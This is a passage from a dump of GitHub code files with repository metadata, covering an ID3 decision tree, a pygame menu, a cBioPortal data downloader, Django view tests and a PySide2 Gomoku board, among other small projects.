dna_data, value):\n \"\"\"Adds a child ID3Node to this node.\"\"\"\n self.children.append(ID3Node(self,\n dna_data=dna_data,\n value=value,\n use_gini_index=self.use_gini_index,\n alpha=self.alpha))\n return\n\n def get_class(self, attrs):\n \"\"\"Gets the class for the given set of attrs.\n\n This function will parse the decision tree to find\n the class for the given set of attributes.\n\n :type attrs: string\n :param attrs: Attributes to clasify given from testing data.\n\n :rtype: string\n :returns: The classification for the given attrs,\n or None if there is not one\n \"\"\"\n if self.is_leaf():\n return self.cls\n else:\n for child in self.children:\n if child.value == attrs[self.attr]:\n return child.get_class(attrs)\n return self.cls\n\n def create_subtree(self, values, attrs):\n \"\"\"Main sub routine that creates the decision tree.\n\n :type values: list\n :param values: List of values to use for creating the tree\n\n :type attrs: str\n :param attrs: Attrs to use to create this subtree\n \"\"\"\n # If no dna data was given to this child, then use the data at the parent node\n if not self.dna_data:\n self.cls = self.parent.cls\n return\n else:\n self.cls = get_class(self.dna_data)\n\n # If no attrs are left to test, then stop making children\n # Or if the dna has all the same class\n if not attrs or is_same_class(self.dna_data):\n return\n\n # calculate the gain for each attr\n gain = []\n for attr in attrs:\n if self.use_gini_index:\n gain.append(gini_gain(self.dna_data, values, attr))\n else:\n gain.append(info_gain(self.dna_data, values, attr))\n\n # gets the attr with the largest gain value,\n # which is the attr we are going to split the tree at\n 
split_attr = gain.index(max(gain))\n self.attr = attrs[split_attr]\n attrs.remove(self.attr)\n\n # create children the get a subset of the data\n # based on the value of the data at the split attr\n for value in values:\n split_data = get_subset(self.dna_data, value, self.attr)\n self.add_child(split_data, value)\n\n #dof = len(values) - 1\n dof = 2 * (len(values) - 1)\n if rej_null_hyp(self, dof, self.alpha):\n # prunechildren\n self.children = []\n return\n\n # Recursively create subtrees\n for child in self.children:\n child.create_subtree(values, attrs)\n return\n","repo_name":"alexebaker/decision-trees","sub_path":"decision_tree/id3.py","file_name":"id3.py","file_ext":"py","file_size_in_byte":14196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"26355635382","text":" \n# 2. Create a dictionary, freq, that displays each character in string str1 as the key and its frequency as the value.\n\nfrom collections import Counter\n\nstr1 = \"peter piper picked a peck of pickled peppers\"\nfreq = Counter(str1)\n\nfor i in str1:\n print(i, freq[i])\n \n# 3. Provided is a string saved to the variable name s1.\n# Create a dictionary named counts that contains each letter in s1 and the number of times it occurs.\n\ns1 = \"hello\"\n\ndef char_frequency(s1):\n dict = {}\n for n in s1:\n keys = dict.keys()\n if n in keys:\n dict[n] += 1\n else:\n dict[n] = 1\n return dict\n\ncounts = char_frequency(s1)\nprint(counts)\n","repo_name":"gowtham957/python3M","sub_path":"Cs2_ass3_2&3.py","file_name":"Cs2_ass3_2&3.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22532811828","text":"from __future__ import print_function\nimport numpy as np\nfrom sklearn import datasets, linear_model\n\nfrom genetic_selection import GeneticSelectionCV\nimport pandas as pd\n\ndef main():\n data = pd.read_csv('predict_house.csv')\n # Some noisy data not correlated\n E = np.random.uniform(0, 0.1, size=(len(data), 20))\n\n X = data.iloc[:, 0:79]\n y = data.iloc[:, -1]\n\n estimator = linear_model.LogisticRegression(solver=\"liblinear\", multi_class=\"ovr\")\n\n selector = GeneticSelectionCV(estimator,\n cv=5,\n verbose=1,\n scoring=\"accuracy\",\n max_features=5,\n n_population=50,\n crossover_proba=0.5,\n mutation_proba=0.2,\n n_generations=40,\n crossover_independent_proba=0.5,\n mutation_independent_proba=0.05,\n tournament_size=3,\n n_gen_no_change=10,\n caching=True,\n n_jobs=-1)\n selector = selector.fit(X, y)\n kq = selector.predict(X)\n j = 0\n for i in y:\n print(i)\n print(kq[j])\n print()\n j = j + 1\n\nif __name__ == \"__main__\":\n main()","repo_name":"NguyenQuyPhuc20173302/MachineLearningBasic","sub_path":"FeatrueSelectionGA/Genetic.py","file_name":"Genetic.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"21204960578","text":"# 10162 전자레인지\n# https://www.acmicpc.net/problem/10162\nt = int(input())\n\na,b,c = 0, 0, 0\n\nwhile t != 0:\n if t >= 300:\n t -= 300\n a += 1\n elif t >= 60:\n t -= 60\n b += 1\n elif t >= 10:\n t -= 10\n c += 1\n elif t%10 != 0:\n break\n\nif t != 0:\n print(-1)\nelse:\n 
print(a,b,c)","repo_name":"BOLTB0X/DataStructure_Argolithm","sub_path":"BOJ/Greedy/10162/10162.py","file_name":"10162.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73134876485","text":"from game.animations import SinWave\nimport pygame\nfrom game.global_state import Global\n\n\nclass TitleText:\n def __init__(self) -> None:\n self.glow = Global()\n self.wave = SinWave(0.03)\n self.font = pygame.font.Font(None, 75)\n self.text = \"Ping Pong\"\n self.surf = self.font.render(self.text, True, \"white\")\n self.rect = self.surf.get_rect(center=self.glow.SCRECT.center)\n self.pos = pygame.Vector2(self.rect.topleft[0], self.rect.topleft[1] - 150)\n self.speed_scalar = 20\n\n def update(self):\n self.pos.y += self.glow.dt * self.wave.val() * self.speed_scalar\n\n def draw(self):\n self.glow.screen.blit(self.surf, self.pos)\n\n\nclass Button:\n FONT = pygame.font.Font(None, 40)\n PAD_Y = -50\n PAD_SEGMENT = 20\n ORG_SPACE_Y = 20\n SPACE_Y = ORG_SPACE_Y\n HOVER_SPEED = 30\n\n def __init__(self, title: str, statename: str = \"\") -> None:\n self.title = title\n self.glow = Global()\n self.wave = SinWave(0.1)\n self.gen_title(\"white\")\n self.rect = self.surf.get_rect(center=self.glow.SCRECT.center)\n self.rect.y += Button.PAD_Y + Button.SPACE_Y\n Button.SPACE_Y += self.rect.height + Button.PAD_SEGMENT\n self.pos = pygame.Vector2(self.rect.topleft)\n self.original_pos = self.pos.copy()\n self.statename = statename\n\n def gen_title(self, color):\n self.color = color\n self.surf = self.FONT.render(self.title, True, color)\n\n def handle_selection(self):\n for event in self.glow.events:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n self.glow.transition.start(self.statename)\n\n def update(self):\n if self.color == \"yellow\":\n self.pos.y += self.wave.val() * self.HOVER_SPEED * self.glow.dt\n self.handle_selection()\n else:\n self.pos = self.original_pos.copy()\n\n self.rect.topleft = self.pos\n\n def draw(self):\n self.glow.screen.blit(self.surf, self.rect)\n\n\nclass Buttons:\n def __init__(self) -> None:\n Button.SPACE_Y = Button.ORG_SPACE_Y\n self.btns = [\n Button(\"< Play >\", statename=\"maingame\"),\n Button(\"< Settings >\"),\n Button(\"< Credits >\"),\n ]\n self.current_btn_index = 0\n self.glow = Global()\n\n @property\n def current_btn_index(self):\n return self.__current_btn_index\n\n @current_btn_index.setter\n def current_btn_index(self, val):\n if val < 0:\n val = len(self.btns) - 1\n if val >= len(self.btns):\n val = 0\n self.__current_btn_index = val\n self.current_btn = self.btns[self.current_btn_index]\n self.current_btn.gen_title(\"yellow\")\n\n def update(self):\n for event in self.glow.events:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.current_btn_index -= 1\n elif event.key == pygame.K_DOWN:\n self.current_btn_index += 1\n\n for index, btn in enumerate(self.btns):\n if index != self.current_btn_index and btn.color != \"white\":\n btn.gen_title(\"white\")\n btn.update()\n\n def draw(self):\n for btn in self.btns:\n btn.draw()\n","repo_name":"blankRiot96/ping-pong","sub_path":"game/main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"40716891788","text":"import re\nimport os\n\nprint(\"Start test\")\n\nrootdir = r\"D:\\data\\cervix\\patients\"\n\nfor i, s in enumerate(m42.scan):\n 
# Save scans\n patient = s.url[int(re.search(r\":[0-9]+\\.\", s.url).start())+1:int(re.search(r\":[0-9]+\\.\", s.url).end())-1]\n s.writenifti(rootdir + \"\\\\\" + patient + \"\\\\\" + s.alias)\n print(s.alias)\n","repo_name":"liuhd073/thesis_cbct_seg_code","sub_path":"data_collection/match42/save_images.py","file_name":"save_images.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42521623542","text":"import streamlit as st\nfrom PIL import Image\n\nwith st.expander(\"Start Camera\"):\n camera_img = st.camera_input(\"Camera\")\n\n\nif camera_img:\n img = Image.open(camera_img)\n\n gray_img = img.convert(\"L\")\n\n st.image(gray_img)\n","repo_name":"ofirzvishaboo/my-todo-web","sub_path":"bonus/bonus19.py","file_name":"bonus19.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13055788567","text":"import pandas as pd\nimport regex as re\n\njobs = pd.read_csv('processed-data/df_cleaned.csv')\n\n# rename column and remove punctuation - these to the cleanup job instead of here?\njobs.rename(columns={'Skills required': 'description'}, inplace=True)\njobs[\"description\"] = jobs['description'].str.replace(r'[^\\w\\s]+', ' ')\n\n\ndef load_skills(path):\n file = open(path, \"r\")\n try:\n content = file.read()\n skills = content.split(\",\")\n finally:\n file.close()\n\n return skills\n\n\ndef calculate_skills(data, skill_list, skill_name):\n skill_counts = []\n for skill in skill_list:\n expr = '\\\\b' + skill + '\\\\b'\n result_set = data[data['description'].str.contains(expr, flags=re.IGNORECASE, regex=True)]\n count = len(result_set.index)\n skill_counts.append([skill, count, (count / len(data.index)) * 100])\n\n result = pd.DataFrame(skill_counts, columns=[skill_name, 'Count', 'Percentage'])\n result.sort_values(by=['Count'], ascending=False, inplace=True)\n\n return result\n\n\nlangs_list = load_skills('resources/skills_programming_languages_onegram.txt')\nlangs_count = calculate_skills(jobs, langs_list, 'Language')\n\nds_list = load_skills('resources/skills_datastores_onegram.txt')\nds_count = calculate_skills(jobs, ds_list, 'Data Store')\n\ndf_list = load_skills('resources/skills_dataformats_onegram.txt')\ndf_count = calculate_skills(jobs, df_list, 'Data Format')\n\ncp_list = load_skills('resources/skills_cloudproviders_onegram.txt')\ncp_count = calculate_skills(jobs, cp_list, 'Cloud Provider')\n\nga_list = load_skills('resources/skills_general_analytics_onegram.txt')\nga_count = calculate_skills(jobs, ga_list, 'General Data Processing')\n\nap_list = load_skills('resources/skills_analytics_products_onegram.txt')\nap_count = calculate_skills(jobs, ap_list, 'Analytics Product')\n\naws_list = load_skills('resources/skills_awsservices_onegram.txt')\naws_count = calculate_skills(jobs, aws_list, 'AWS Service')\n\n# print(langs_count)\n# print(ds_count)\n# print(df_count)\n# print(cp_count)\n# print(ga_count)\n# print(ap_count)\n# 
print(aws_count)\n\nlangs_count.to_csv('processed-data/skill-counts-programming-languages.csv')\nds_count.to_csv('processed-data/skill-counts-data-stores.csv')\ndf_count.to_csv('processed-data/skill-counts-data_formats.csv')\ncp_count.to_csv('processed-data/skill-counts-cloud-providers.csv')\nga_count.to_csv('processed-data/skill-counts-general-analytics.csv')\nap_count.to_csv('processed-data/skill-counts-analytics-products.csv')\naws_count.to_csv('processed-data/skill-counts-aws-services.csv')\n","repo_name":"homander/ids2020","sub_path":"src/skill_counts.py","file_name":"skill_counts.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37692250381","text":"import argparse\nimport os\n\nfrom typing import List\n\nfrom post_processor.file import JsonFile, File\nfrom post_processor.file_processor import MetadataProcessor, DescriptorProcessor, LinkProcessor, \\\n ProcessMetadataProcessor, DataProcessor, JsonFileProcessor\nfrom post_processor.util import get_json_file_paths, get_file_paths, dump_json\nfrom post_processor.uuid_tracker import UuidTracker\n\n\nclass PostProcessor:\n def __init__(self, project_dir_path: str, new_dir_path: str = None):\n self.project_dir_path = project_dir_path\n self.new_dir_path = os.getcwd() if not new_dir_path else new_dir_path\n self.uuid_tracker = UuidTracker()\n\n self.processed_files_by_file_path = {}\n\n def process(self):\n self.process_json_files(f'{self.project_dir_path}/metadata',\n MetadataProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n self.process_json_files(f'{self.project_dir_path}/descriptors',\n DescriptorProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n self.process_json_files(f'{self.project_dir_path}/links',\n LinkProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n self.process_json_files(f'{self.project_dir_path}/metadata/process',\n ProcessMetadataProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n\n self.save_files()\n\n self.process_data_files(f'{self.project_dir_path}/data',\n DataProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n\n def process_json_files(self, dir_path: str, processor: JsonFileProcessor):\n json_files = self.find_json_files(dir_path)\n for json_file in json_files:\n processor.process(json_file)\n self.processed_files_by_file_path[json_file.file_path] = json_file\n\n def find_json_files(self, dir_path: str) -> List['JsonFile']:\n entity_files = (JsonFile(file_path) for file_path in get_json_file_paths(dir_path))\n return entity_files\n\n def save_files(self):\n for file_path in self.processed_files_by_file_path:\n file: JsonFile = self.processed_files_by_file_path.get(file_path)\n os.makedirs(file.new_dir_path, exist_ok=True)\n dump_json(file.new_content, file.new_file_path)\n\n def process_data_files(self, dir_path: str, processor: DataProcessor):\n entity_files = self.find_data_files(dir_path)\n for entity_file in entity_files:\n processor.process(entity_file)\n\n def find_data_files(self, dir_path: str) -> List['File']:\n entity_files = (File(file_path) for file_path in get_file_paths(dir_path))\n return entity_files\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('path', help=\"Project directory path\", metavar=\"FILE\")\n args = parser.parse_args()\n\n if \"~\" in args.path:\n 
path = os.path.expanduser(args.path)\n else:\n path = args.path\n\n post_processor = PostProcessor(path)\n post_processor.process()\n","repo_name":"HumanCellAtlas/schema-test-data","sub_path":"src/post_process.py","file_name":"post_process.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38673987400","text":"import csv\nfrom concurrent.futures import as_completed\nfrom concurrent.futures.thread import ThreadPoolExecutor\n\nfrom requests import get\n\nfrom pypgatk.toolbox.exceptions import AppException\nfrom pypgatk.toolbox.general import ParameterConfiguration, check_create_folders, download_file, clear_cache\nfrom pypgatk.toolbox.rest import call_api, call_api_raw\n\n\nclass CbioPortalDownloadService(ParameterConfiguration):\n CONFIG_KEY_DATA_DOWNLOADER = 'cbioportal_data_downloader'\n CONFIG_KEY_CBIOPORTAL_DOWNLOAD_URL = 'cbioportal_download_url'\n CONFIG_OUTPUT_DIRECTORY = 'output_directory'\n CONFIG_CBIOPORTAL_API = 'cbioportal_api'\n CONFIG_CBIOPORTAL_API_SERVER = 'base_url'\n CONFIG_CBIOPORTAL_API_CANCER_STUDIES = \"cancer_studies\"\n CONFIG_LIST_STUDIES = \"list_studies\"\n CONFIG_MULTITHREADING = \"multithreading\"\n\n def __init__(self, config_file, pipeline_arguments):\n \"\"\"\n Init the class with the specific parameters.\n :param config_file configuration file\n :param pipeline_arguments pipelines arguments\n \"\"\"\n super(CbioPortalDownloadService, self).__init__(self.CONFIG_KEY_DATA_DOWNLOADER, config_file,\n pipeline_arguments)\n\n self._cbioportal_studies = []\n if self.CONFIG_OUTPUT_DIRECTORY in self.get_pipeline_parameters():\n self._local_path_cbioportal = self.get_pipeline_parameters()[self.CONFIG_OUTPUT_DIRECTORY]\n else:\n self._local_path_cbioportal = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][\n self.CONFIG_OUTPUT_DIRECTORY]\n\n self._list_studies = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][self.CONFIG_LIST_STUDIES]\n if self.CONFIG_LIST_STUDIES in self.get_pipeline_parameters():\n self._list_studies = self.get_pipeline_parameters()[self.CONFIG_LIST_STUDIES]\n\n self._multithreading = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][\n self.CONFIG_MULTITHREADING]\n if self.CONFIG_MULTITHREADING in self.get_pipeline_parameters():\n self._multithreading = self.get_pipeline_parameters()[self.CONFIG_MULTITHREADING]\n\n self.prepare_local_cbioportal_repository()\n\n def prepare_local_cbioportal_repository(self):\n self.get_logger().debug(\"Preparing local cbioportal repository, root folder - '{}'\".format(\n self.get_local_path_root_cbioportal_repo()))\n check_create_folders([self.get_local_path_root_cbioportal_repo()])\n self.get_logger().debug(\n \"Local path for cbioportal Release - '{}'\".format(self.get_local_path_root_cbioportal_repo()))\n\n def get_local_path_root_cbioportal_repo(self):\n return self._local_path_cbioportal\n\n def get_cancer_studies(self):\n \"\"\"\n This method will print the list of all cancer studies for the user.\n :return:\n \"\"\"\n server = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][self.CONFIG_CBIOPORTAL_API][\n self.CONFIG_CBIOPORTAL_API_SERVER]\n endpoint = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][self.CONFIG_CBIOPORTAL_API][\n self.CONFIG_CBIOPORTAL_API_CANCER_STUDIES]\n self._cbioportal_studies = call_api_raw(server + \"?\" + endpoint).text\n return self._cbioportal_studies\n\n def download_study(self, download_study):\n \"\"\"\n 
This function will download a study from cBioPortal using the study ID\n :param download_study: Study to be download, if the study is empty or None, all the studies will be\n downloaded.\n :return: None\n \"\"\"\n\n clear_cache()\n\n if self._cbioportal_studies is None or len(self._cbioportal_studies) == 0:\n self.get_cancer_studies()\n\n if 'all' not in download_study:\n if not self.check_study_identifier(download_study):\n msg = \"The following study accession '{}' is not present in cBioPortal Studies\".format(download_study)\n self.get_logger().debug(msg)\n raise AppException(msg)\n else:\n self.download_one_study(download_study)\n else:\n csv_reader = csv.reader(self._cbioportal_studies.splitlines(), delimiter=\"\\t\")\n line_count = 0\n if self._multithreading:\n processes = []\n with ThreadPoolExecutor(max_workers=10, thread_name_prefix='Thread-Download') as executor:\n for row in csv_reader:\n if line_count != 0:\n processes.append(executor.submit(self.download_one_study, row[0]))\n line_count = line_count + 1\n for task in as_completed(processes):\n print(task.result())\n else:\n for row in csv_reader:\n if line_count != 0:\n self.download_one_study(row[0])\n line_count = line_count + 1\n\n def download_one_study(self, download_study):\n file_name = '{}.tar.gz'.format(download_study)\n file_url = '{}/{}'.format(\n self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][self.CONFIG_KEY_CBIOPORTAL_DOWNLOAD_URL],\n file_name)\n file_name = download_file(file_url, self.get_local_path_root_cbioportal_repo() + '/' + file_name, self.get_logger())\n if file_name is not None:\n msg = \"The following study '{}' has been downloaded. \".format(download_study)\n else:\n msg = \"The following study '{}' hasn't been downloaded. \".format(download_study)\n self.get_logger().debug(msg)\n return file_name\n\n def check_study_identifier(self, download_study):\n return download_study in self._cbioportal_studies\n","repo_name":"codacy-badger/py-pgatk","sub_path":"pypgatk/cgenomes/cbioportal_downloader.py","file_name":"cbioportal_downloader.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"99"} +{"seq_id":"42581835485","text":"from django.conf.urls import include, url\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'invit.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^events/', include('events.urls')),\n url(r'^users/', include('users.urls')),\n url(r'^membership/', include('membership.urls')),\n]\n","repo_name":"vinay-pad/invit","sub_path":"routerv1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"40202939367","text":"N = int(input())\noutput = 0\nfor i in range(1,N+1):\n val = int(i) #245\n tmp = val #245\n strVal = str(i) #245 str\n for j in strVal:\n tmp = tmp + int(j) # 245 + 2 + 4 + 5\n con = tmp\n if con ==N:\n output = val\n break\nprint(output) ","repo_name":"tommysgit/Coding-Test","sub_path":"백준/Bronze/2231. 
분해합/분해합.py","file_name":"분해합.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"72614109003","text":"__author__ = 'Fenno'\n\nfrom numpy import array, unique\nfrom numpy.random import rand, permutation\nfrom sklearn import datasets\n\n\ndef simpledataset(n=20, spread=0.6):\n seeds = array([(0.5, 0.5), (0.5, 1.5), (1.5, 0.5), (1.5, 1.5)] * n)\n labels = array([0, 1, 2, 3] * n)\n offsets = spread * rand((4*n), 2) - (spread/2)\n return seeds+offsets, labels, 4\n\n\ndef realdataset(dataset=datasets.load_iris):\n data = dataset().data\n target = dataset().target\n shuffle = permutation(len(target))\n n_clusters = len(unique(target))\n return data[shuffle], target[shuffle], n_clusters","repo_name":"fennovj/natural-clustering","sub_path":"app/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"8666557504","text":"import sys\n\nimport PySide2\nfrom PySide2.QtGui import *\nfrom PySide2.QtWidgets import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtMultimedia import QSound\n\nfrom MyButton import MyButton\nfrom Chessman import Chessman\n\n\nclass GameWidget(QWidget):\n goback_signal = Signal()\n start_signal = Signal()\n regret_signal = Signal()\n lose_signal = Signal()\n # 落子信号\n position_signal = Signal(tuple)\n\n def __init__(self, parent=None):\n super(GameWidget, self).__init__(parent=parent)\n\n self.setWindowTitle('我的五子棋')\n\n self.setWindowIcon(QIcon('source/icon.icon'))\n\n # 设置背景图片\n p = QPalette(self.palette()) # 获得当前的调色板\n brush = QBrush(QImage('source/游戏界面.png'))\n p.setBrush(QPalette.Background, brush) # 设置调色板\n self.setPalette(p) # 给窗口设置调色板\n\n self.setFixedSize(QImage('source/游戏界面.png').size())\n # 返回按钮\n self.goback_button = MyButton(self, 'source/返回按钮_hover.png', 'source/返回按钮_normal.png', 'source/返回按钮_press.png')\n self.goback_button.move(655, 80)\n self.goback_button.clicked_signal.connect(self.goback_signal)\n # 开始按钮\n self.start_button = MyButton(self, 'source/开始按钮_hover.png', 'source/开始按钮_normal.png', 'source/开始按钮_press.png')\n self.start_button.move(640, 240)\n self.start_button.clicked_signal.connect(self.start_signal)\n # 悔棋按钮\n self.regret_button = MyButton(self, 'source/悔棋按钮_hover.png', 'source/悔棋按钮_normal.png', 'source/悔棋按钮_press.png')\n self.regret_button.move(640, 300)\n self.regret_button.clicked_signal.connect(self.regret_signal)\n # 认输按钮\n self.lose_button = MyButton(self, 'source/认输按钮_hover.png', 'source/认输按钮_normal.png', 'source/认输按钮_press.png')\n self.lose_button.move(640, 360)\n self.lose_button.clicked_signal.connect(self.lose_signal)\n\n # 落子标识\n self.focus_point = QLabel(self)\n self.focus_point.setPixmap(QPixmap('source/标识.png'))\n self.focus_point.hide()\n\n # 获胜图片\n self.win_lbl = QLabel(self)\n self.win_lbl.hide()\n\n # 存储棋盘上所有棋子\n self.chessman_list = []\n\n def resert(self):\n '''\n 重置棋盘\n '''\n # range(0,len(self.chessman_list))\n for i in list(range(0, len(self.chessman_list)))[::-1]: # 下标逆序 从后往前\n self.chessman_list[i].close() # 关闭棋子显示\n del self.chessman_list[i] # 销毁棋子\n self.focus_point.hide() # 隐藏标识\n self.win_lbl.hide() # 隐藏获胜标识\n\n def mouseReleaseEvent(self, event: PySide2.QtGui.QMouseEvent):\n '''\n 处理鼠标释放事件\n '''\n coord_x = event.x() # 获得鼠标x坐标\n coord_y = event.y()\n\n # 坐标转换成位置\n pos = self.reverse_to_position((coord_x, coord_y))\n # 如果位置有效,则发送落子信号\n if pos is None:\n return\n else:\n 
self.position_signal.emit(pos)\n\n # position:tuple 为参数指定类型 为tuple,可以不写\n def reverse_to_coordinate(self, position: tuple):\n '''\n 将落子位置转换成坐标\n\n x坐标 = 50 + 水平位置 * 30\n y坐标 = 50 + 垂直位置 * 30\n '''\n\n x = 50 + position[0] * 30\n y = 50 + position[1] * 30\n return (x, y)\n\n def reverse_to_position(self, coordinate: tuple) -> tuple:\n '''\n 将点击坐标转换成落子位置\n '''\n # 判断落子坐标是否有效\n # 棋盘坐标范围:左 > 35 上 > 35 右 < 590+15 下边 < 590 + 15\n x = coordinate[0]\n y = coordinate[1]\n if x <= 35 or x >= 590 + 15 or y <= 35 or y >= 590 + 15:\n return\n # 将坐标转换为落子位置\n # 思路 相对于35坐标偏向右移多少个30的宽度\n pos_x = (x - 35) // 30\n pos_y = (y - 35) // 30\n return(pos_x,pos_y)\n\n def down_chess(self, position, color):\n '''\n 落子\n position:落子位置\n x:水平位置 19个位置,0~18\n y:垂直位置 19个位置,0~18\n color:棋子颜色\n '''\n # 构建一个棋子\n chessman = Chessman(color, self) # 棋子颜色、父窗口\n # 将位置转换成坐标,然后将棋子移动到该位置\n coord = QPoint(*self.reverse_to_coordinate(position))\n chessman.move(coord)\n chessman.show()\n chessman.raise_() # 确保棋子显示\n # 播放落子声\n QSound.play('source/luozisheng.wav')\n # 将棋子放到当前棋子列表中\n self.chessman_list.append(chessman)\n # 显示棋子标识、\n self.focus_point.move(coord.x() - 15, coord.y() - 15)\n self.focus_point.show()\n # 让标识在上层显示\n self.focus_point.raise_()\n\n def goback(self):\n '''\n 悔棋\n '''\n # 判断 如果没有棋子,则函数返回\n if len(self.chessman_list) == 0:\n return\n # 获取最后一个棋子\n chessman = self.chessman_list.pop()\n # 从界面删除棋子\n chessman.close()\n # 销毁棋子对象\n del chessman\n # 隐藏标识\n self.focus_point.hide()\n\n def show_win(self, color):\n '''\n color: 获胜方 颜色\n '''\n if color == 'White':\n # 白棋获胜\n self.win_lbl.setPixmap(QPixmap('source/白棋胜利.png'))\n else:\n # 黑棋获胜\n self.win_lbl.setPixmap(QPixmap('source/黑棋胜利.png'))\n self.win_lbl.move(65, 84)\n self.win_lbl.show()\n self.win_lbl.raise_()\n\n\n\nif __name__ == '__main__':\n app = QApplication([])\n w = GameWidget()\n def print_position(position):\n print('print_position:', position)\n w.down_chess(position,'Black')\n # 绑定悔棋按钮与悔棋方法\n w.regret_signal.connect(w.goback)\n # 绑定开始按钮与清空棋盘方法\n w.start_signal.connect(w.resert)\n # 绑定落子信号和打印测试\n w.position_signal.connect(print_position)\n w.show_win('Black')\n w.down_chess((10, 15), 'White')\n w.show()\n sys.exit(app.exec_())\n","repo_name":"CKSYJ3040/GoBang","sub_path":"GameWidget.py","file_name":"GameWidget.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"30603063730","text":"from django.urls import reverse_lazy\nfrom django.test import tag\nfrom django.views.generic import CreateView, UpdateView\n\nfrom . import SharedModelsFactoryFloor as FactoryFloor\nfrom .common_tests import CommonTest\nfrom .. import views\nfrom .. 
import models\nfrom ..views import CommonUpdateView\n\n\nclass TestSectionUpdateView(CommonTest):\n def setUp(self):\n super().setUp()\n self.instance = FactoryFloor.SectionFactory()\n self.test_url = reverse_lazy('shared_models:section_edit', kwargs={\"pk\": self.instance.pk})\n self.expected_template = 'shared_models/org_form.html'\n self.admin_user = self.get_and_login_user(in_group=\"travel_admin\")\n\n @tag(\"section_edit\", 'update', \"view\")\n def test_view_class(self):\n self.assert_inheritance(views.SectionUpdateView, CommonUpdateView)\n self.assert_inheritance(views.SectionUpdateView, views.AdminRequiredMixin)\n\n @tag(\"section_edit\", 'update', \"access\")\n def test_view(self):\n self.assert_not_broken(self.test_url)\n self.assert_non_public_view(test_url=self.test_url, expected_template=self.expected_template, user=self.admin_user)\n\n\n @tag(\"section_edit\", 'update', \"submit\")\n def test_submit(self):\n data = FactoryFloor.SectionFactory.get_valid_data()\n self.assert_success_url(self.test_url, data=data, user=self.admin_user)\n\n\n\nclass TestDivisionUpdateView(CommonTest):\n def setUp(self):\n super().setUp()\n self.instance = FactoryFloor.DivisionFactory()\n self.test_url = reverse_lazy('shared_models:division_edit', kwargs={\"pk\": self.instance.pk})\n self.expected_template = 'shared_models/org_form.html'\n self.admin_user = self.get_and_login_user(in_group=\"travel_admin\")\n\n @tag(\"division_edit\", 'update', \"view\")\n def test_view_class(self):\n self.assert_inheritance(views.DivisionUpdateView, CommonUpdateView)\n self.assert_inheritance(views.DivisionUpdateView, views.AdminRequiredMixin)\n\n @tag(\"division_edit\", 'update', \"access\")\n def test_view(self):\n self.assert_not_broken(self.test_url)\n self.assert_non_public_view(test_url=self.test_url, expected_template=self.expected_template, user=self.admin_user)\n\n\n @tag(\"division_edit\", 'update', \"submit\")\n def test_submit(self):\n data = FactoryFloor.DivisionFactory.get_valid_data()\n self.assert_success_url(self.test_url, data=data, user=self.admin_user)\n\n\nclass TestBranchUpdateView(CommonTest):\n def setUp(self):\n super().setUp()\n self.instance = FactoryFloor.BranchFactory()\n self.test_url = reverse_lazy('shared_models:branch_edit', kwargs={\"pk\": self.instance.pk})\n self.expected_template = 'shared_models/org_form.html'\n self.admin_user = self.get_and_login_user(in_group=\"travel_admin\")\n\n @tag(\"branch_edit\", 'update', \"view\")\n def test_view_class(self):\n self.assert_inheritance(views.BranchUpdateView, CommonUpdateView)\n self.assert_inheritance(views.BranchUpdateView, views.AdminRequiredMixin)\n\n @tag(\"branch_edit\", 'update', \"access\")\n def test_view(self):\n self.assert_not_broken(self.test_url)\n self.assert_non_public_view(test_url=self.test_url, 